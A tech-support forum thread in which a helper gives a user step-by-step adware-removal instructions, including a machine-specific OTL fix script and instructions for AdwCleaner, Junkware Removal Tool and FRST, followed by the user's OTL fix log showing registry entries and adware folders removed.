[2014/12/07 08:17:26 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{F632853D-342C-43F3-B48D-0F881466EF47}
[2014/12/07 07:48:05 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{54E5AD7A-46AA-4A28-A002-A698C77C9FCE}
[2014/12/06 10:12:07 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{2EFEAD60-4A39-41D8-9D9E-DABFDD178FE2}
[2014/12/05 21:22:09 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{19426403-8E37-45F2-9B32-7BD5D9196B91}
[2014/12/05 08:54:16 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{4F264C4A-BC66-4EE5-9729-FEBC94940DAE}
[2014/12/04 08:38:36 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{A64B1B77-F70B-4F72-889C-EECA456A2A53}
[2014/12/03 09:10:30 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{BD50A9B9-794F-415E-B22B-E8A226C2566B}
[2014/12/02 19:59:08 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{58E20622-838A-4DF6-87FF-633A4762CED0}
[2014/12/02 07:58:40 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{E63427D4-2D93-4ECF-A293-EA717FEC94B9}
[2014/12/01 07:27:06 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{14077749-0317-4E61-9A41-5B38A6CB89AF}
[2014/12/01 00:27:11 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{9919C10E-8A71-45EC-ACBA-EFF36D84CB71}
[2014/11/30 22:15:05 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{93B92312-0CD7-4DD0-B3E3-5E9EBF0FFAB5}
[2014/11/30 16:29:21 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{9F484F36-6982-41DF-B3F5-3F7F29871782}
[2014/11/29 22:40:44 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{730054E7-1B19-4831-93B1-130BAADA1170}
[2014/11/29 09:30:29 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{92C091D9-97B4-40EA-8CE6-53788471D9F8}
[2014/11/28 15:49:12 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{D4C697C7-A168-49A1-BACA-7A35453589CA}
[2014/11/28 03:48:43 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{3BF2C825-1CD2-4217-B154-ADFB27720D18}
[2014/11/27 13:19:15 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{72283AC5-4FD6-4FCF-ACA7-0F1434D31AA3}
[2014/11/26 19:57:06 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{F06BE51C-24FB-48F9-BA43-A1DD75C7DFDE}
[2014/11/26 18:13:45 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{8C17B09D-3B72-4713-A05F-47A292E98DDB}
[2014/11/26 06:08:57 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{1096C07C-5A4A-4DE5-B6DB-0B2E9D6FB231}
[2014/09/08 16:30:27 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\BitTorrent
@Alternate Data Stream - 357 bytes -> C:\ProgramData\Temp:7A8EE542
 
:Commands
[EmptyTemp]

 
3. Click the Run Fix button. OTL will ask to reboot the machine. Please do so when asked.
4. After the reboot a log file should open. Copy/Paste the contents of the log that opens and post in your next reply. If for some reason the log file does not appear then you can
    open Notepad (Start->All Programs->Accessories->Notepad), click File->Open, in the File Name box enter *.log and press the Enter key, navigate to the C:\_OTL\MovedFiles folder,
    and open the newest .log file present, and copy/paste the contents of that document back here in your next post.
 
 
Step#3 - AdWCleaner
1. Please download AdwCleaner by Xplode onto your desktop.
2. Close all open programs and internet browsers.
3. Right-click on AdwCleaner.exe and select Run as administrator to run the tool.
4. Click on Scan.
5. After the scan is complete click on "Clean"
6. Confirm each time with Ok.
7. Your computer will be rebooted automatically. A text file will open after the restart.
8. Please post the content of that logfile with your next answer.
9. If need be, you can also find the logfile at C:\AdwCleaner\AdwCleaner[S0].txt as well.
 
 
Step#4 - JRT
 
Note: Please disable your Antivirus Software before doing these steps. Info on how to do this is here.
1. Download Junkware Removal Tool to your desktop.
2. Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
3, The tool will open and start scanning your system.
4. Please be patient as this can take a while to complete depending on your system's specifications.
5. On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
6. Close the text file and reboot your machine.
7. After your machine is rebooted, please re-enable your antivirus.
8. Post the contents of JRT.txt into your next message.
 
 
Step#5 - FRST Scan
 
1. Please download Farbar Recovery Scan Tool and save it to your Desktop.
    Note: You need to run the 64-bit Version so please ensure you download that one.
2. Right click to run as administrator. When the tool opens click Yes to disclaimer.
3. Please ensure you place a check mark in the Addition.txt check box at the bottom of the form before running (if not already).
4. Press Scan button.
5. It will produce a log called FRST.txt in the same directory the tool is run from (which should now be the desktop)
6. Please copy and paste log back here.
7. Another log (Addition.txt - also located in the same directory as FRST64.exe) will be generated Please also paste that along with the FRST.txt into your reply.
 
  
 
Items for your next post
1. OTL Fix log
2. AdwCleaner log
3. Junkware log
4. FRST & Addition logs
5. How's your machine doing?


  • 0

#7
RUSTY2

RUSTY2

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 221 posts

Thank you for the logs. Let me know how your machine is doing after this.
 
Step#1 - Warnings
I see that you have CCleaner installed. This is indeed a good product but I wanted to caution you on running the registry cleaning functionality of the tool. Please avoid this as it can do more harm than good.
 
Step#2 - OTL Fix
1. Right click on OTL.exe and choose Run as administrator.
2. Copy all the code below and paste it into the Custom Scans/Fixes section at the very bottom of the OTL program. Do NOT include the word Quote.
 
 

:Commands
[CreateRestorePoint]
 
:OTL
IE:64bit: - HKLM\..\SearchScopes\{1CA5F7BC-89BD-2C9A-E064-1D25A782985E}: "URL" = http://astromenda.co....=1701220253=
IE:64bit: - HKLM\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2476}: "URL" = http://www.default-s...p={searchTerms}
IE - HKLM\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2476}: "URL" = http://www.default-s...p={searchTerms}
IE - HKCU\..\SearchScopes\{1CA5F7BC-89BD-2C9A-E064-1D25A782985E}: "URL" = http://astromenda.co....=1701220253=
IE - HKCU\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2476}: "URL" = http://www.default-s...p={searchTerms}
FF - prefs.js..browser.search.order.1: "default-search.net"
FF - prefs.js..extensions.enabledAddons: %7B6e7f6f9f-8ce6-4611-add2-05f0f7049ee6%7D:1.10.0.1
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{6e7f6f9f-8ce6-4611-add2-05f0f7049ee6}: C:\Program Files (x86)\Mozilla Firefox\extensions\{6e7f6f9f-8ce6-4611-add2-05f0f7049ee6}
CHR - Extension: No name found = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\llhlggpfgfhboddiaobbadofpaoamana\1.0\
O3:64bit: - HKLM\..\Toolbar: (no name) - 10 - No CLSID value found.
O3 - HKLM\..\Toolbar: (no name) - 10 - No CLSID value found.
O4 - HKLM..\Run: []  File not found
O4 - HKLM..\Run: [mobilegeni daemon] C:\Program Files (x86)\Mobogenie\DaemonProcess.exe File not found
O4 - HKCU..\Run: [052B6A76D3592F59F21802FFF2A3D98838477D09._service_run] "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=service File not found
[2014/12/30 10:08:28 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{161EA2E7-1A2F-48C2-A791-C4E958323664}
[2014/12/29 13:32:08 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{C0BA43A4-9C39-49CD-A803-0174513E7C00}
[2014/12/28 06:36:09 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{016D6421-1701-49DF-8B52-7F6D4D653389}
[2014/12/27 11:37:04 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{AF92B2FA-5ED5-408A-9B43-0CBB91604675}
[2014/12/26 11:27:37 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{4F520A6F-5EA8-4BEA-81F9-B213BAD2FB51}
[2014/12/26 05:18:33 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{BB9A289D-82F3-4D81-8BCA-37F8290221F8}
[2014/12/25 08:23:20 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{36ECD5BF-2A83-4EA1-9F2A-1372D52EC2F1}
[2014/12/24 16:15:26 | 000,000,000 | ---D | C] -- C:\ProgramData\436c0126c213f27c
[2014/12/24 16:15:15 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\Chromatic Browser
[2014/12/24 16:15:14 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\Torch
[2014/12/24 16:15:13 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\Comodo
[2014/12/24 10:23:04 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{D1D4E566-89C5-4661-8587-D6DA3F967427}
[2014/12/23 14:38:57 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{E77F53AB-5CFA-4331-956C-89F6A49FE417}
[2014/12/23 01:33:07 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{BCCE8D52-2930-4318-9A56-A0EE74801811}
[2014/12/22 22:26:12 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{F6ACB3ED-A8EB-4261-A125-679BE2200DF1}
[2014/12/22 10:12:36 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{2316A05D-D4E2-4776-AAA8-C916225F95B1}
[2014/12/22 09:30:52 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{44FA6A8F-D05A-4E14-A8A4-9E824AB036DE}
[2014/12/21 09:09:44 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{328853B6-F344-46E7-811C-47AA890B1249}
[2014/12/20 10:05:05 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{F2C52649-44F5-467B-8A99-E251AEF10909}
[2014/12/20 03:04:01 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{0B6787CF-D8C6-48D0-897B-33F9B1773BAD}
[2014/12/19 10:27:51 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{F09B2DFA-DA99-4A9B-97BD-721FCC82C682}
[2014/12/18 10:14:34 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{40FB4ED4-C216-45AB-A934-9A01052FF0A6}
[2014/12/17 11:42:30 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{6C252B3B-90AF-477B-8B9B-C3CB6A4240B8}
[2014/12/16 21:00:04 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{486DC693-CB7F-4A9C-AB4C-119EAEAD3EA2}
[2014/12/16 08:48:31 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{BD179AF9-9327-4607-BA8F-2E09D6442B43}
[2014/12/15 19:40:20 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{3EC3E9E4-4CEC-4EE4-B929-B6DB842B7DF2}
[2014/12/15 07:38:11 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{95F1AFE4-66B6-4106-AF1F-E3E11FFB541D}
[2014/12/14 09:56:36 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{097310BC-264E-423E-BBE6-3C0984A7526F}
[2014/12/13 14:39:24 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{8DF0A1ED-2752-4C1B-9961-B4961D9AB7C4}
[2014/12/13 09:25:26 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{A7A4483E-D295-4DEC-9ECA-9BAA997A158C}
[2014/12/12 17:10:22 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{F42EF7D8-6D04-4744-85A2-68D0885DE588}
[2014/12/12 10:15:52 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{92389730-EE55-458F-9993-0CC5EAE8DD72}
[2014/12/11 10:53:42 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{5181130D-474C-41A2-B058-1F81726AC940}
[2014/12/10 16:46:09 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{5BD4D736-C10B-4BC1-A66A-B22E90D4FF9E}
[2014/12/10 15:45:48 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{C3324AE5-1973-450C-9049-BA3B1DDA1F65}
[2014/12/09 22:31:33 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{D744513F-8905-44B3-AFE8-FBD8F082E66C}
[2014/12/09 08:38:40 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{8745E557-E33E-47E5-80C3-B14966613146}
[2014/12/08 15:39:36 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{E7494A2A-69FF-408C-9493-855166F661D5}
[2014/12/07 23:10:51 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{37789C42-330D-4A1B-8B9F-2A2B553ACC0E}
[2014/12/07 23:09:55 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{04F5D5DE-4566-41A0-9560-4296D7568CE6}
[2014/12/07 08:17:26 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{F632853D-342C-43F3-B48D-0F881466EF47}
[2014/12/07 07:48:05 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{54E5AD7A-46AA-4A28-A002-A698C77C9FCE}
[2014/12/06 10:12:07 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{2EFEAD60-4A39-41D8-9D9E-DABFDD178FE2}
[2014/12/05 21:22:09 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{19426403-8E37-45F2-9B32-7BD5D9196B91}
[2014/12/05 08:54:16 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{4F264C4A-BC66-4EE5-9729-FEBC94940DAE}
[2014/12/04 08:38:36 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{A64B1B77-F70B-4F72-889C-EECA456A2A53}
[2014/12/03 09:10:30 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{BD50A9B9-794F-415E-B22B-E8A226C2566B}
[2014/12/02 19:59:08 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{58E20622-838A-4DF6-87FF-633A4762CED0}
[2014/12/02 07:58:40 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{E63427D4-2D93-4ECF-A293-EA717FEC94B9}
[2014/12/01 07:27:06 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{14077749-0317-4E61-9A41-5B38A6CB89AF}
[2014/12/01 00:27:11 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{9919C10E-8A71-45EC-ACBA-EFF36D84CB71}
[2014/11/30 22:15:05 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{93B92312-0CD7-4DD0-B3E3-5E9EBF0FFAB5}
[2014/11/30 16:29:21 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{9F484F36-6982-41DF-B3F5-3F7F29871782}
[2014/11/29 22:40:44 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{730054E7-1B19-4831-93B1-130BAADA1170}
[2014/11/29 09:30:29 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{92C091D9-97B4-40EA-8CE6-53788471D9F8}
[2014/11/28 15:49:12 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{D4C697C7-A168-49A1-BACA-7A35453589CA}
[2014/11/28 03:48:43 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{3BF2C825-1CD2-4217-B154-ADFB27720D18}
[2014/11/27 13:19:15 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{72283AC5-4FD6-4FCF-ACA7-0F1434D31AA3}
[2014/11/26 19:57:06 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{F06BE51C-24FB-48F9-BA43-A1DD75C7DFDE}
[2014/11/26 18:13:45 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{8C17B09D-3B72-4713-A05F-47A292E98DDB}
[2014/11/26 06:08:57 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{1096C07C-5A4A-4DE5-B6DB-0B2E9D6FB231}
[2014/09/08 16:30:27 | 000,000,000 | ---D | M] -- C:\Users\BR\AppData\Roaming\BitTorrent
@Alternate Data Stream - 357 bytes -> C:\ProgramData\Temp:7A8EE542
 
:Commands
[EmptyTemp]

 
3. Click the Run Fix button. OTL will ask to reboot the machine. Please do so when asked.
4. After the reboot a log file should open. Copy/Paste the contents of the log that opens and post in your next reply. If for some reason the log file does not appear then you can
    open Notepad (Start->All Programs->Accessories->Notepad), click File->Open, in the File Name box enter *.log and press the Enter key, navigate to the C:\_OTL\MovedFiles folder,
    and open the newest .log file present, and copy/paste the contents of that document back here in your next post.
 
 
Step#3 - AdWCleaner
1. Please download AdwCleaner by Xplode onto your desktop.
2. Close all open programs and internet browsers.
3. Right-click on AdwCleaner.exe and select Run as administrator to run the tool.
4. Click on Scan.
5. After the scan is complete click on "Clean"
6. Confirm each time with Ok.
7. Your computer will be rebooted automatically. A text file will open after the restart.
8. Please post the content of that logfile with your next answer.
9. If need be, you can also find the logfile at C:\AdwCleaner\AdwCleaner[S0].txt as well.
 
 
Step#4 - JRT
 
Note: Please disable your Antivirus Software before doing these steps. Info on how to do this is here.
1. Download Junkware Removal Tool to your desktop.
2. Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
3, The tool will open and start scanning your system.
4. Please be patient as this can take a while to complete depending on your system's specifications.
5. On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
6. Close the text file and reboot your machine.
7. After your machine is rebooted, please re-enable your antivirus.
8. Post the contents of JRT.txt into your next message.
 
 
Step#5 - FRST Scan
 
1. Please download Farbar Recovery Scan Tool and save it to your Desktop.
    Note: You need to run the 64-bit Version so please ensure you download that one.
2. Right click to run as administrator. When the tool opens click Yes to disclaimer.
3. Please ensure you place a check mark in the Addition.txt check box at the bottom of the form before running (if not already).
4. Press Scan button.
5. It will produce a log called FRST.txt in the same directory the tool is run from (which should now be the desktop)
6. Please copy and paste log back here.
7. Another log (Addition.txt - also located in the same directory as FRST64.exe) will be generated Please also paste that along with the FRST.txt into your reply.
 
  
 
Items for your next post
1. OTL Fix log
2. AdwCleaner log
3. Junkware log
4. FRST & Addition logs
5. How's your machine doing?

#1 OTL FIX LOG

All processes killed
========== COMMANDS ==========
Restore point Set: OTL Restore Point
========== OTL ==========
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{1CA5F7BC-89BD-2C9A-E064-1D25A782985E}\ deleted successfully.
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1CA5F7BC-89BD-2C9A-E064-1D25A782985E}\ not found.
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2476}\ deleted successfully.
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2476}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2476}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2476}\ not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{1CA5F7BC-89BD-2C9A-E064-1D25A782985E}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1CA5F7BC-89BD-2C9A-E064-1D25A782985E}\ not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2476}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2476}\ not found.
Prefs.js: "default-search.net" removed from browser.search.order.1
Prefs.js: %7B6e7f6f9f-8ce6-4611-add2-05f0f7049ee6%7D:1.10.0.1 removed from extensions.enabledAddons
Registry value HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{6e7f6f9f-8ce6-4611-add2-05f0f7049ee6} deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6e7f6f9f-8ce6-4611-add2-05f0f7049ee6}\ not found.
File C:\Program Files (x86)\Mozilla Firefox\extensions\{6e7f6f9f-8ce6-4611-add2-05f0f7049ee6} not found.
C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\llhlggpfgfhboddiaobbadofpaoamana\1.0 folder moved successfully.
64bit-Registry value HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Toolbar\\10 deleted successfully.
Registry value HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Toolbar\\10 deleted successfully.
Registry value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\\ deleted successfully.
Registry value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\\mobilegeni daemon deleted successfully.
Registry value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\052B6A76D3592F59F21802FFF2A3D98838477D09._service_run deleted successfully.
C:\Users\BR\AppData\Local\{161EA2E7-1A2F-48C2-A791-C4E958323664} folder moved successfully.
C:\Users\BR\AppData\Local\{C0BA43A4-9C39-49CD-A803-0174513E7C00} folder moved successfully.
C:\Users\BR\AppData\Local\{016D6421-1701-49DF-8B52-7F6D4D653389} folder moved successfully.
C:\Users\BR\AppData\Local\{AF92B2FA-5ED5-408A-9B43-0CBB91604675} folder moved successfully.
C:\Users\BR\AppData\Local\{4F520A6F-5EA8-4BEA-81F9-B213BAD2FB51} folder moved successfully.
C:\Users\BR\AppData\Local\{BB9A289D-82F3-4D81-8BCA-37F8290221F8} folder moved successfully.
C:\Users\BR\AppData\Local\{36ECD5BF-2A83-4EA1-9F2A-1372D52EC2F1} folder moved successfully.
C:\ProgramData\436c0126c213f27c folder moved successfully.
C:\Users\BR\AppData\Local\Chromatic Browser\User Data\Default\Extensions\llhlggpfgfhboddiaobbadofpaoamana\1.0 folder moved successfully.
C:\Users\BR\AppData\Local\Chromatic Browser\User Data\Default\Extensions\llhlggpfgfhboddiaobbadofpaoamana folder moved successfully.
C:\Users\BR\AppData\Local\Chromatic Browser\User Data\Default\Extensions folder moved successfully.
C:\Users\BR\AppData\Local\Chromatic Browser\User Data\Default folder moved successfully.
C:\Users\BR\AppData\Local\Chromatic Browser\User Data folder moved successfully.
C:\Users\BR\AppData\Local\Chromatic Browser folder moved successfully.
C:\Users\BR\AppData\Local\Torch\User Data\Default\Extensions\llhlggpfgfhboddiaobbadofpaoamana\1.0 folder moved successfully.
C:\Users\BR\AppData\Local\Torch\User Data\Default\Extensions\llhlggpfgfhboddiaobbadofpaoamana folder moved successfully.
C:\Users\BR\AppData\Local\Torch\User Data\Default\Extensions folder moved successfully.
C:\Users\BR\AppData\Local\Torch\User Data\Default folder moved successfully.
C:\Users\BR\AppData\Local\Torch\User Data folder moved successfully.
C:\Users\BR\AppData\Local\Torch folder moved successfully.
C:\Users\BR\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\llhlggpfgfhboddiaobbadofpaoamana\1.0 folder moved successfully.
C:\Users\BR\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\llhlggpfgfhboddiaobbadofpaoamana folder moved successfully.
C:\Users\BR\AppData\Local\Comodo\Dragon\User Data\Default\Extensions folder moved successfully.
C:\Users\BR\AppData\Local\Comodo\Dragon\User Data\Default folder moved successfully.
C:\Users\BR\AppData\Local\Comodo\Dragon\User Data folder moved successfully.
C:\Users\BR\AppData\Local\Comodo\Dragon folder moved successfully.
C:\Users\BR\AppData\Local\Comodo folder moved successfully.
C:\Users\BR\AppData\Local\{D1D4E566-89C5-4661-8587-D6DA3F967427} folder moved successfully.
C:\Users\BR\AppData\Local\{E77F53AB-5CFA-4331-956C-89F6A49FE417} folder moved successfully.
C:\Users\BR\AppData\Local\{BCCE8D52-2930-4318-9A56-A0EE74801811} folder moved successfully.
C:\Users\BR\AppData\Local\{F6ACB3ED-A8EB-4261-A125-679BE2200DF1} folder moved successfully.
C:\Users\BR\AppData\Local\{2316A05D-D4E2-4776-AAA8-C916225F95B1} folder moved successfully.
C:\Users\BR\AppData\Local\{44FA6A8F-D05A-4E14-A8A4-9E824AB036DE} folder moved successfully.
C:\Users\BR\AppData\Local\{328853B6-F344-46E7-811C-47AA890B1249} folder moved successfully.
C:\Users\BR\AppData\Local\{F2C52649-44F5-467B-8A99-E251AEF10909} folder moved successfully.
C:\Users\BR\AppData\Local\{0B6787CF-D8C6-48D0-897B-33F9B1773BAD} folder moved successfully.
C:\Users\BR\AppData\Local\{F09B2DFA-DA99-4A9B-97BD-721FCC82C682} folder moved successfully.
C:\Users\BR\AppData\Local\{40FB4ED4-C216-45AB-A934-9A01052FF0A6} folder moved successfully.
C:\Users\BR\AppData\Local\{6C252B3B-90AF-477B-8B9B-C3CB6A4240B8} folder moved successfully.
C:\Users\BR\AppData\Local\{486DC693-CB7F-4A9C-AB4C-119EAEAD3EA2} folder moved successfully.
C:\Users\BR\AppData\Local\{BD179AF9-9327-4607-BA8F-2E09D6442B43} folder moved successfully.
C:\Users\BR\AppData\Local\{3EC3E9E4-4CEC-4EE4-B929-B6DB842B7DF2} folder moved successfully.
C:\Users\BR\AppData\Local\{95F1AFE4-66B6-4106-AF1F-E3E11FFB541D} folder moved successfully.
C:\Users\BR\AppData\Local\{097310BC-264E-423E-BBE6-3C0984A7526F} folder moved successfully.
C:\Users\BR\AppData\Local\{8DF0A1ED-2752-4C1B-9961-B4961D9AB7C4} folder moved successfully.
C:\Users\BR\AppData\Local\{A7A4483E-D295-4DEC-9ECA-9BAA997A158C} folder moved successfully.
C:\Users\BR\AppData\Local\{F42EF7D8-6D04-4744-85A2-68D0885DE588} folder moved successfully.
C:\Users\BR\AppData\Local\{92389730-EE55-458F-9993-0CC5EAE8DD72} folder moved successfully.
C:\Users\BR\AppData\Local\{5181130D-474C-41A2-B058-1F81726AC940} folder moved successfully.
C:\Users\BR\AppData\Local\{5BD4D736-C10B-4BC1-A66A-B22E90D4FF9E} folder moved successfully.
C:\Users\BR\AppData\Local\{C3324AE5-1973-450C-9049-BA3B1DDA1F65} folder moved successfully.
C:\Users\BR\AppData\Local\{D744513F-8905-44B3-AFE8-FBD8F082E66C} folder moved successfully.
C:\Users\BR\AppData\Local\{8745E557-E33E-47E5-80C3-B14966613146} folder moved successfully.
C:\Users\BR\AppData\Local\{E7494A2A-69FF-408C-9493-855166F661D5} folder moved successfully.
C:\Users\BR\AppData\Local\{37789C42-330D-4A1B-8B9F-2A2B553ACC0E} folder moved successfully.
C:\Users\BR\AppData\Local\{04F5D5DE-4566-41A0-9560-4296D7568CE6} folder moved successfully.
C:\Users\BR\AppData\Local\{F632853D-342C-43F3-B48D-0F881466EF47} folder moved successfully.
C:\Users\BR\AppData\Local\{54E5AD7A-46AA-4A28-A002-A698C77C9FCE} folder moved successfully.
C:\Users\BR\AppData\Local\{2EFEAD60-4A39-41D8-9D9E-DABFDD178FE2} folder moved successfully.
C:\Users\BR\AppData\Local\{19426403-8E37-45F2-9B32-7BD5D9196B91} folder moved successfully.
C:\Users\BR\AppData\Local\{4F264C4A-BC66-4EE5-9729-FEBC94940DAE} folder moved successfully.
C:\Users\BR\AppData\Local\{A64B1B77-F70B-4F72-889C-EECA456A2A53} folder moved successfully.
C:\Users\BR\AppData\Local\{BD50A9B9-794F-415E-B22B-E8A226C2566B} folder moved successfully.
C:\Users\BR\AppData\Local\{58E20622-838A-4DF6-87FF-633A4762CED0} folder moved successfully.
C:\Users\BR\AppData\Local\{E63427D4-2D93-4ECF-A293-EA717FEC94B9} folder moved successfully.
C:\Users\BR\AppData\Local\{14077749-0317-4E61-9A41-5B38A6CB89AF} folder moved successfully.
C:\Users\BR\AppData\Local\{9919C10E-8A71-45EC-ACBA-EFF36D84CB71} folder moved successfully.
C:\Users\BR\AppData\Local\{93B92312-0CD7-4DD0-B3E3-5E9EBF0FFAB5} folder moved successfully.
C:\Users\BR\AppData\Local\{9F484F36-6982-41DF-B3F5-3F7F29871782} folder moved successfully.
C:\Users\BR\AppData\Local\{730054E7-1B19-4831-93B1-130BAADA1170} folder moved successfully.
C:\Users\BR\AppData\Local\{92C091D9-97B4-40EA-8CE6-53788471D9F8} folder moved successfully.
C:\Users\BR\AppData\Local\{D4C697C7-A168-49A1-BACA-7A35453589CA} folder moved successfully.
C:\Users\BR\AppData\Local\{3BF2C825-1CD2-4217-B154-ADFB27720D18} folder moved successfully.
